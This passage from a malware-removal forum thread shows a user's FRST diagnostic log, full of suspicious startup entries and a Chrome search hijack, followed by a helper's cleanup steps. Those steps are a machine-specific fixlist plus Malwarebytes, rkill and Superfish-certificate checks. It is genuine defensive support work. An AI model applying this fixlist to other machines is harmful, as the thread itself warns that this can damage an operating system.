2016-04-11 19:16 - 2016-04-05 22:12 - 00097944 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libegl.dll
2009-12-10 04:39 - 2008-09-19 04:03 - 00167936 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\LIBPQ.dll
2009-02-12 20:01 - 2006-11-06 19:18 - 00963584 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\libxml2.dll
2005-07-20 06:48 - 2005-07-20 07:48 - 00059904 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\zlib1.dll
2008-02-04 22:43 - 2008-02-04 23:43 - 00027136 _____ () C:\Program Files (x86)\PostgreSQL\8.3\lib\plugins\plugin_debugger.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00020792 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2016-02-10 21:59 - 2016-02-10 21:59 - 00170496 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\c77312f309b32c7ba095241bb8fa6749\IsdiInterop.ni.dll
2010-06-18 01:06 - 2010-04-13 12:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-19 13:15 - 2016-03-11 19:16 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\RoNiN\Desktop\Pics\Taxi Driver Cinespia.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: ) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: 1198E835-A0AB-4C55-9629-D16AFAD406CB => 3
MSCONFIG\Services: 93530252-4B7E-48FF-9DAA-4D90DB571BBB => 3
MSCONFIG\Services: ACDaemon => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: APNMCP => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: AppxikenoZ => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BrsHelper => 2
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: CLDTVHNService => 2
MSCONFIG\Services: CloudPrinter => 2
MSCONFIG\Services: CltMngSvc => 2
MSCONFIG\Services: Dataup => 2
MSCONFIG\Services: dojygici => 2
MSCONFIG\Services: Ejuvde => 2
MSCONFIG\Services: ETDService => 2
MSCONFIG\Services: FirebirdServerMAGIXInstance => 3
MSCONFIG\Services: Gambali => 2
MSCONFIG\Services: groover110320162257 Updater => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Jhfuy => 2
MSCONFIG\Services: kBTNrls => 2
MSCONFIG\Services: McciCMService => 2
MSCONFIG\Services: McciCMService64 => 2
MSCONFIG\Services: MPCProtectService => 
MSCONFIG\Services: mwrc => 2
MSCONFIG\Services: Nijgatfy => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Service Mgr FindSearchWindow => 2
MSCONFIG\Services: shopperz130320161459 Updater => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SMUpd => 2
MSCONFIG\Services: SPBIUpd => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: Update Mgr FindSearchWindow => 2
MSCONFIG\Services: wdsvc => 2
MSCONFIG\Services: wrc => 2
MSCONFIG\Services: wucotusy => 2
MSCONFIG\Services: wugixojyzbt => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\Services: zigipyro => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk => C:\windows\pss\Microsoft Office.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\RoNiN\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ArcSoft Connection Service => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1423.0\mswinext.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: com.apple.dav.bookmarks.daemon => C:\Program Files (x86)\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: HP Photosmart 6510 series (NET) => "C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN1852217505QB:NW" -scfn "HP Photosmart 6510 series (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Live Update 5 => C:\Program Files (x86)\MSI\Live Update 5\BootStartLiveupdate.exe /reminder
MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: PCShowServer => "C:\Users\RoNiN\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: ShadowPlay => C:\windows\system32\rundll32.exe C:\windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SkyDrive => "C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Users\RoNiN\update\realsched.exe"  -osboot
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: UpdReg => C:\windows\UpdReg.EXE
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
HKLM\...\StartupApproved\StartupFolder: => "AllPCoptimizer.exe.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WebBrowserMixVideoPlayer.lnk"
HKLM\...\StartupApproved\Run: => "THXCfg64"
HKLM\...\StartupApproved\Run: => "IDSCPRODUCT"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "CitrixReceiver"
HKLM\...\StartupApproved\Run32: => "Rt45"
HKLM\...\StartupApproved\Run32: => "BSOD"
HKLM\...\StartupApproved\Run32: => "QwaT1"
HKLM\...\StartupApproved\Run32: => "QwaT4"
HKLM\...\StartupApproved\Run32: => "QwaT5"
HKLM\...\StartupApproved\Run32: => "QwaTgg"
HKLM\...\StartupApproved\Run32: => "QwaT22"
HKLM\...\StartupApproved\Run32: => "QwaT55"
HKLM\...\StartupApproved\Run32: => "QwaT21"
HKLM\...\StartupApproved\Run32: => "QwaT78"
HKLM\...\StartupApproved\Run32: => "QwaT"
HKLM\...\StartupApproved\Run32: => "Rty01"
HKLM\...\StartupApproved\Run32: => "cpx"
HKLM\...\StartupApproved\Run32: => "Rt562@"
HKLM\...\StartupApproved\Run32: => "mpck_en_005030264"
HKLM\...\StartupApproved\Run32: => "msrtn32"
HKLM\...\StartupApproved\Run32: => "ospd_us_037010264"
HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "rec_en_222"
HKLM\...\StartupApproved\Run32: => "rec_en_224"
HKLM\...\StartupApproved\Run32: => "rst"
HKLM\...\StartupApproved\Run32: => "sun13"
HKLM\...\StartupApproved\Run32: => "TV"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "Storm Alerts.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "StormAlertsApp.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "SideSync"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "wdbext"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "Windi"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{354199B7-F83D-495C-9D2C-3BA29A4920A5}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{10D8A433-FF54-408D-BD19-8ECAF71549D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{C8C0F0F4-0183-4523-BC93-2E0D15D26F01}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{21F97557-5316-4375-84A5-0B7440C1C0D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{F23838C4-65A8-4FC7-B6C2-6B70C4E93033}] => (Allow) LPort=808
FirewallRules: [{B2A68B46-9A65-4A8E-B285-1E48E4A7B975}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
FirewallRules: [{BF87AEAD-08C8-402A-835D-3474CD53CC70}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{39A33CB2-D099-4F9A-B02A-951093D131D3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1BA4519A-A342-4BB7-B7ED-08B0A6CC57F6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{DDA3509A-3FD8-4C09-87F6-F4CB0C7DA6F4}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1A44FB89-25DE-4E0A-A722-0E07C2162364}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{0113C91F-F729-4DB8-8CD4-21A2E49DD8C6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [TCP Query User{4E874D1D-1D1B-4AA1-BD8B-A789E8030874}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{A7DAE9F1-5ADA-449C-B077-BEAAEEBF82D2}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{86453128-7424-45D8-8978-BA280CCA1BC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
 
==================== Restore Points =========================
 
28-04-2016 18:43:41 Scheduled Checkpoint
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/30/2016 01:53:09 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.
 
Error: (04/30/2016 01:51:35 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.
 
Error: (04/30/2016 01:04:38 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3716) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/30/2016 01:04:38 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3716) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/30/2016 01:04:28 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3716) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/30/2016 01:04:28 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3716) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/30/2016 01:04:17 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3716) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/30/2016 01:04:17 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3716) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/30/2016 01:04:07 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3716) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/30/2016 01:04:07 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3716) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
 
System errors:
=============
Error: (04/30/2016 12:38:47 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Xbox Live Auth Manager service terminated with the following service-specific error: 
%%0
 
Error: (04/30/2016 11:36:01 AM) (Source: volmgr) (EventID: 46) (User: )
Description: Crash dump initialization failed!
 
Error: (04/30/2016 11:35:52 AM) (Source: sptd) (EventID: 4) (User: )
Description: Driver detected an internal error in its data structures for .
 
Error: (04/30/2016 11:36:33 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:31:42 AM on 4/29/2016 was unexpected.
 
Error: (04/29/2016 07:41:43 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Xbox Live Auth Manager service terminated with the following service-specific error: 
%%0
 
Error: (04/28/2016 06:09:39 PM) (Source: volsnap) (EventID: 25) (User: )
Description: The shadow copies of volume C: were deleted because the shadow copy storage could not grow in time.  Consider reducing the IO load on the system or choose a shadow copy storage volume that is not being shadow copied.
 
Error: (04/28/2016 06:07:43 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (60000 milliseconds) while waiting for the User Data Storage_Session2 service to connect.
 
Error: (04/28/2016 06:07:43 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (60000 milliseconds) while waiting for the Sync Host_Session2 service to connect.
 
Error: (04/28/2016 06:07:33 PM) (Source: DCOM) (EventID: 10010) (User: RONIN-LAPTOP)
Description: CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca
 
Error: (04/28/2016 06:07:33 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
 
CodeIntegrity:
===================================
  Date: 2016-03-11 18:17:52.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.703
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.394
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.129
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:50.762
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.939
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.925
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.802
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 00:41:18.766
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 450 @ 2.40GHz
Percentage of memory in use: 67%
Total physical RAM: 3885.5 MB
Available physical RAM: 1282.08 MB
Total Virtual: 3885.5 MB
Available Virtual: 385.64 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.4 GB) (Free:3.32 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:180.26 GB) (Free:117.9 GB) NTFS
Drive w: (BIOS_RVY) (Fixed) (Total:12 GB) (Free:3.31 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 9C73A223)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================
 
6) Security Check - 
 

 Results of screen317's Security Check version 1.014 --- 12/23/15  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Windows Defender   
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Java 8 Update 77  
 Java version 32-bit out of Date! 
  Adobe Flash Player 16.0.0.305 Flash Player out of Date!  
 Adobe Reader XI  
 Google Chrome (49.0.2623.110) 
 Google Chrome (49.0.2623.112) 
````````Process Check: objlist.exe by Laurent````````  
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 
 


#14 Jo*


  • Malware Response Team
  • 3,425 posts
  • Gender:Male
  • Location:Germany

Posted 01 May 2016 - 01:52 AM

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it in the same location as FRST / FRST64 (usually your desktop) as fixlist.txt

 
Start
CreateRestorePoint:
CloseProcesses:
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
CMD: type C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
EmptyTemp:
Hosts:
End

NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system.


Run FRST / FRST64 again like we did before but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.

---

Download and run Chrome Software Cleaner

---

Please download and run the following tool to help allow other programs to run. (courtesy of BleepingComputer.com)
There are 5 different versions. If one of them won't run then download and try to run the other one.
Vista and Win7/8/10 users need to right click and choose Run as Administrator
You only need to get one of them to run, not all of them. Do not reboot your computer after running rkill as the malware programs will start again.

---

Malwarebytes' Anti-Malware
If this program is already installed: Skip the installation and run only the scan!
Download and install: Please download Malwarebytes Anti-Malware to your desktop.
  • Double-click mb3-setup-1878.1878-3.5.1.2522.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
How to get logs: (Export log to save as txt)
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Export'.
  • Click 'Text file (*.txt)'
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
  • Click Ok
  • Attach that saved log to your next reply.
(Copy to clipboard for pasting into forum replies or tickets)
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.
---

Try LastPass Superfish Checker

Check the certificates:

  • Click the Windows Start button
  • Type certmgr.msc into the Search box
  • Click the certmgr.msc Program to launch it
  • If prompted for administrator password, enter the password or provide confirmation
  • Click on Trusted Root Certification Authorities
  • Open Certificates
  • Look for certificates mentioning Superfish Inc.
  • Right-click on any Superfish Inc certificates and delete
  • Restart your browser
Firefox & Thunderbird Users:
  • Open Firefox
  • Click the menu in the top right and select "Options" or open the Tools menu > Options
  • Click the Advanced tab
  • Click "View Certificates"
  • Scroll through until you see Superfish Inc
  • Click the Superfish, Inc - Software Security Device option
  • Press "Delete or Distrust"
  • Confirm it shows "Superfish Inc" and press OK

Did you find certificates mentioning Superfish Inc.?

---

Edited by Jo*, 01 May 2016 - 02:58 AM.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.
